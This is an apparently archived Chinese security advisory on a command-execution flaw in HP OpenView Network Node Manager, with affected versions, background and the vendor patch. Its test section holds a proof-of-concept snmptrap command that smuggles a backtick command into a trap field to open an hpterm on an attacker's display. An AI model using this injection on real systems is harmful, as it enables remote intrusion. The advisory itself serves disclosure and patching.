发布日期：2001-06-12
更新日期：2001-06-22

受影响系统：

HP OpenView Network Node Manager 6.1
HP OpenView Network Node Manager 5.01
   - Sun Solaris 8.0
   - Sun Solaris 7.0
   - Sun Solaris 2.6
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
   - HP HP-UX 11.0
   - HP HP-UX 10.20

描述：

---

BUGTRAQ  ID: 2845
CVE(CAN) ID: CAN-2001-0552

HP OpenView Network Node Manager是由HP公司发布的一个系统管理软件，面向企业系
统，并且提供远程管理。

HP OpenView Network Node Manager的缺省配置允许在特定情况下执行命令，攻击者通
过发送一个精心构造的命令，可能会在系统上以bin用户权限执行任意命令。

<*来源：Milo van der Zee (milo.van.der.zee@ordina.nl) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Milo van der Zee (milo.van.der.zee@ordina.nl)提供了如下测试代
码：

      snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1
s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s
"" [snip...] 12 s ""



建议：

---

厂商补丁：

HP已经发布了针对这个漏洞的补丁程序：

HP patch PHSS_23779
http://us-support2.external.hp.com/wpsl/bin/doc.pl




浏览次数：3844
严重程度：0（网友投票）